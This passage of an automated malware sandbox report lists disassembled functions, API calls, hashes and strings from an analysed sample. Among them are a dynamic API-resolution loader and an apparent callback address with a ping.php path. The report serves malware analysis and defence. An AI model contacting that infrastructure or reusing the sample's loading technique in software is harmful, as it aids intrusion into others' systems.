Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: b164839f8546e13ab4c05bc1cb922cf1e64e58a5da62cfcfe366b8e81ae94921
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 15011732100208FBDF12AF95DC40EEB7B69EF9D754F044115FE28AA120D732E9629BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCAA Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4

Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B

_UnwindNestedFrames.LIBCMT ref: 0040CCD9
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
CallCatchBlock.LIBVCRUNTIME ref: 0040CD12

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 031674BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0315ED94,00000000,00000000,?,03167461,0315ED94,00000000,00000000,00000000,?,03167719,00000006,0042F348), ref: 031674EC
GetLastError.KERNEL32(?,03167461,0315ED94,00000000,00000000,00000000,?,03167719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,03167052), ref: 031674F8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,03167461,0315ED94,00000000,00000000,00000000,?,03167719,00000006,0042F348,0042F340,0042F348,00000000), ref: 03167506

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 483d3c8fae24f4a59a03601989e4a23942030f08b7b5fee0ac745a4bb6869db7
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: CE01F7367512279BC731CFB8AC58A567B9CAF097A6B5505B0FA0AD31C0EB20D921C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004129CD

Strings

pow, xrefs: 004129A5, 004129C2

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E

Uniqueness

Uniqueness Score: -1.00%

Function 0041DDFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21

Strings

.A, xrefs: 0041DE13
, xrefs: 0041DE66

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: Info
String ID: $.A
API String ID: 1807457897-2696116503
Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0315A937 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0315A96A
__IsNonwritableInCurrentImage.LIBCMT ref: 0315AA23

Strings

csm, xrefs: 0315AA0D

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: ab4fefd495289a9c05f8342e5a0903fc13eb58ba1e586ac4982d84b2fc8ea424
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: 5B41F334A80299DBCF11DF28C884AAEBBB5AF4D314F1882A5FC355B391D731DA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0316FFF9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 031700D4

Strings

ACP, xrefs: 03170017
OCP, xrefs: 0317004D

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: cbb5bfa9df1a6deeb1cb05f046d42668cbf7adb40a9cf0d2bc198a09f2cf392a
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 11219862A01304A7EB34CB54C901BABB27EAB4DBF1F5F8565E909D7204E737D980C354

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD92 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 0041FE6D

Strings

OCP, xrefs: 0041FDE6
ACP, xrefs: 0041FDB0

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C

Uniqueness

Uniqueness Score: -1.00%

Function 031762B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 031762B6

Part of subcall function 03151E19: __EH_prolog.LIBCMT ref: 03151E1E

Part of subcall function 0315266A: __EH_prolog.LIBCMT ref: 0315266F

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 03176398

Strings

,jC, xrefs: 0317638D

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID: ,jC
API String ID: 420165198-3201430929
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 5f6d3f1318f70d18bfda01ffae9fd4d81efb056fd91e8207d88daf26c6f1cb40
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: F2310B79D01219EFDB14DF94D980AEDF7B4FF48300F1085AAE815A7640DB346A48CF60

Uniqueness

Uniqueness Score: -1.00%

Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00417217
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224

Strings

-@, xrefs: 004171EE, 00417202, 004171F3

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: -@
API String ID: 2279764990-2564449678
Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 031537D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 031537DB

Strings

185.172.128.228, xrefs: 031537E2
/ping.php?substr=%s, xrefs: 031537E3

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 59cdab9d560d0d0a781bd6f7ba0639d41eab7686d8e36711611b743f9d56331c
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: C401AD7AA01215EBDB05DF98DC40BAEF7B9FF48650F14052AFC25DB240D374AA408AE5

Uniqueness

Uniqueness Score: -1.00%

Function 0040356F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403574

Strings

/ping.php?substr=%s, xrefs: 0040357C
185.172.128.228, xrefs: 0040357B

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: H_prolog
String ID: /ping.php?substr=%s$185.172.128.228
API String ID: 3519838083-3577573015
Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402FEA
std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6

Strings

T*@, xrefs: 00402FFA

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: T*@
API String ID: 4198646248-2370032326
Opcode ID: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
Opcode Fuzzy Hash: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00404373

Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47

__Getcoll.LIBCPMT ref: 004043CF

Strings

u@@, xrefs: 004043C9

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: H_prolog$Getcoll
String ID: u@@
API String ID: 206117190-736001340
Opcode ID: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
Opcode Fuzzy Hash: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0316A93B Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0316A9D1
GetLastError.KERNEL32 ref: 0316A9DF
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0316AA3A

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction ID: a768311e9eeb60d81587b239c68c6763441357a2ed66de620dac6c8bee4485bd
Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction Fuzzy Hash: 34410B74600286AFCF35CFE4CD447BABBA8DF09310F19916AF959BB1A1D7309921C761

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6D4 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
GetLastError.KERNEL32 ref: 0041A778
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
Opcode Fuzzy Hash: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: u42w.0.exePID: 1720, Parent PID: 5288COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	42

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,02F60850), ref: 0041625D
GetProcAddress.KERNEL32(74DD0000,02F605F0), ref: 00416275
GetProcAddress.KERNEL32(74DD0000,02F61828), ref: 0041628E
GetProcAddress.KERNEL32(74DD0000,02F61840), ref: 004162A6
GetProcAddress.KERNEL32(74DD0000,02F61858), ref: 004162BE
GetProcAddress.KERNEL32(74DD0000,02F617E0), ref: 004162D7
GetProcAddress.KERNEL32(74DD0000,02F5EFB0), ref: 004162EF
GetProcAddress.KERNEL32(74DD0000,02F61798), ref: 00416307
GetProcAddress.KERNEL32(74DD0000,02F617B0), ref: 00416320
GetProcAddress.KERNEL32(74DD0000,02F617C8), ref: 00416338
GetProcAddress.KERNEL32(74DD0000,02F64FF0), ref: 00416350
GetProcAddress.KERNEL32(74DD0000,02F60870), ref: 00416369
GetProcAddress.KERNEL32(74DD0000,02F606D0), ref: 00416381
GetProcAddress.KERNEL32(74DD0000,02F606B0), ref: 00416399
GetProcAddress.KERNEL32(74DD0000,02F60750), ref: 004163B2
GetProcAddress.KERNEL32(74DD0000,02F65008), ref: 004163CA
GetProcAddress.KERNEL32(74DD0000,02F65050), ref: 004163E2
GetProcAddress.KERNEL32(74DD0000,02F5F0F0), ref: 004163FB
GetProcAddress.KERNEL32(74DD0000,02F60930), ref: 00416413
GetProcAddress.KERNEL32(74DD0000,02F65020), ref: 0041642B
GetProcAddress.KERNEL32(74DD0000,02F65068), ref: 00416444
GetProcAddress.KERNEL32(74DD0000,02F64FD8), ref: 0041645C
GetProcAddress.KERNEL32(74DD0000,02F65080), ref: 00416474
GetProcAddress.KERNEL32(74DD0000,02F607F0), ref: 0041648D
GetProcAddress.KERNEL32(74DD0000,02F65038), ref: 004164A5
GetProcAddress.KERNEL32(74DD0000,02F64FC0), ref: 004164BD
GetProcAddress.KERNEL32(74DD0000,02F64FA8), ref: 004164D6
GetProcAddress.KERNEL32(74DD0000,02F64DF8), ref: 004164EE
GetProcAddress.KERNEL32(74DD0000,02F64DC8), ref: 00416506
GetProcAddress.KERNEL32(74DD0000,02F64E58), ref: 0041651F
GetProcAddress.KERNEL32(74DD0000,02F64EE8), ref: 00416537
GetProcAddress.KERNEL32(74DD0000,02F64E88), ref: 0041654F
GetProcAddress.KERNEL32(74DD0000,02F64E10), ref: 00416568
GetProcAddress.KERNEL32(74DD0000,02F41E48), ref: 00416580
GetProcAddress.KERNEL32(74DD0000,02F64ED0), ref: 00416598
GetProcAddress.KERNEL32(74DD0000,02F64D20), ref: 004165B1
GetProcAddress.KERNEL32(74DD0000,02F60810), ref: 004165C9
GetProcAddress.KERNEL32(74DD0000,02F64DB0), ref: 004165E1
GetProcAddress.KERNEL32(74DD0000,02F60830), ref: 004165FA
GetProcAddress.KERNEL32(74DD0000,02F64E70), ref: 00416612
GetProcAddress.KERNEL32(74DD0000,02F64F18), ref: 0041662A
GetProcAddress.KERNEL32(74DD0000,02F60570), ref: 00416643
GetProcAddress.KERNEL32(74DD0000,02F60590), ref: 0041665B
LoadLibraryA.KERNEL32(02F64F78,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(02F64D68,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(02F64EB8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(02F64F00,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(02F64F30,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(02F64CD8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(02F64CF0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(02F64D80,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(75290000,02F60210), ref: 0041670A
GetProcAddress.KERNEL32(75290000,02F64D08), ref: 00416722
GetProcAddress.KERNEL32(75290000,02F61900), ref: 0041673A
GetProcAddress.KERNEL32(75290000,02F64E28), ref: 00416753
GetProcAddress.KERNEL32(75290000,02F60510), ref: 0041676B
GetProcAddress.KERNEL32(73B50000,02F5F1B8), ref: 00416790
GetProcAddress.KERNEL32(73B50000,02F60490), ref: 004167A9
GetProcAddress.KERNEL32(73B50000,02F5F258), ref: 004167C1
GetProcAddress.KERNEL32(73B50000,02F64D98), ref: 004167D9
GetProcAddress.KERNEL32(73B50000,02F64DE0), ref: 004167F2
GetProcAddress.KERNEL32(73B50000,02F604B0), ref: 0041680A
GetProcAddress.KERNEL32(73B50000,02F60430), ref: 00416822
GetProcAddress.KERNEL32(73B50000,02F64F48), ref: 0041683B
GetProcAddress.KERNEL32(752C0000,02F603B0), ref: 0041685C
GetProcAddress.KERNEL32(752C0000,02F60470), ref: 00416874
GetProcAddress.KERNEL32(752C0000,02F64D38), ref: 0041688D
GetProcAddress.KERNEL32(752C0000,02F64F60), ref: 004168A5
GetProcAddress.KERNEL32(752C0000,02F604D0), ref: 004168BD
GetProcAddress.KERNEL32(74EC0000,02F5EE98), ref: 004168E3
GetProcAddress.KERNEL32(74EC0000,02F5F2F8), ref: 004168FB
GetProcAddress.KERNEL32(74EC0000,02F64EA0), ref: 00416913
GetProcAddress.KERNEL32(74EC0000,02F604F0), ref: 0041692C
GetProcAddress.KERNEL32(74EC0000,02F60390), ref: 00416944
GetProcAddress.KERNEL32(74EC0000,02F5EFD8), ref: 0041695C
GetProcAddress.KERNEL32(75BD0000,02F64F90), ref: 00416982
GetProcAddress.KERNEL32(75BD0000,02F60270), ref: 0041699A
GetProcAddress.KERNEL32(75BD0000,02F618F0), ref: 004169B2
GetProcAddress.KERNEL32(75BD0000,02F64CC0), ref: 004169CB
GetProcAddress.KERNEL32(75BD0000,02F64D50), ref: 004169E3
GetProcAddress.KERNEL32(75BD0000,02F60530), ref: 004169FB
GetProcAddress.KERNEL32(75BD0000,02F60550), ref: 00416A14
GetProcAddress.KERNEL32(75BD0000,02F64E40), ref: 00416A2C
GetProcAddress.KERNEL32(75BD0000,02F657A0), ref: 00416A44
GetProcAddress.KERNEL32(75A70000,02F60290), ref: 00416A66
GetProcAddress.KERNEL32(75A70000,02F65800), ref: 00416A7E
GetProcAddress.KERNEL32(75A70000,02F65818), ref: 00416A96
GetProcAddress.KERNEL32(75A70000,02F657B8), ref: 00416AAF
GetProcAddress.KERNEL32(75A70000,02F657D0), ref: 00416AC7
GetProcAddress.KERNEL32(75450000,02F605B0), ref: 00416AE8
GetProcAddress.KERNEL32(75450000,02F605D0), ref: 00416B01
GetProcAddress.KERNEL32(75DA0000,02F60230), ref: 00416B22
GetProcAddress.KERNEL32(75DA0000,02F656E0), ref: 00416B3A
GetProcAddress.KERNEL32(6F090000,02F60350), ref: 00416B60
GetProcAddress.KERNEL32(6F090000,02F601F0), ref: 00416B78
GetProcAddress.KERNEL32(6F090000,02F60310), ref: 00416B90
GetProcAddress.KERNEL32(6F090000,02F65830), ref: 00416BA9
GetProcAddress.KERNEL32(6F090000,02F60410), ref: 00416BC1
GetProcAddress.KERNEL32(6F090000,02F60450), ref: 00416BD9
GetProcAddress.KERNEL32(6F090000,02F60370), ref: 00416BF2
GetProcAddress.KERNEL32(6F090000,02F60250), ref: 00416C0A
GetProcAddress.KERNEL32(75AF0000,02F65770), ref: 00416C2B
GetProcAddress.KERNEL32(75AF0000,02F61A70), ref: 00416C44
GetProcAddress.KERNEL32(75AF0000,02F65728), ref: 00416C5C
GetProcAddress.KERNEL32(75AF0000,02F65740), ref: 00416C74
GetProcAddress.KERNEL32(75D90000,02F603D0), ref: 00416C96
GetProcAddress.KERNEL32(6CBB0000,02F65848), ref: 00416CB7
GetProcAddress.KERNEL32(6CBB0000,02F60330), ref: 00416CCF
GetProcAddress.KERNEL32(6CBB0000,02F656C8), ref: 00416CE8
GetProcAddress.KERNEL32(6CBB0000,02F65788), ref: 00416D00

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s\%s\%s, xrefs: 004117DB
%s%s, xrefs: 00411838
%s\%s, xrefs: 00411714
%s\%s, xrefs: 004117FD
%s\*, xrefs: 0041165D

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
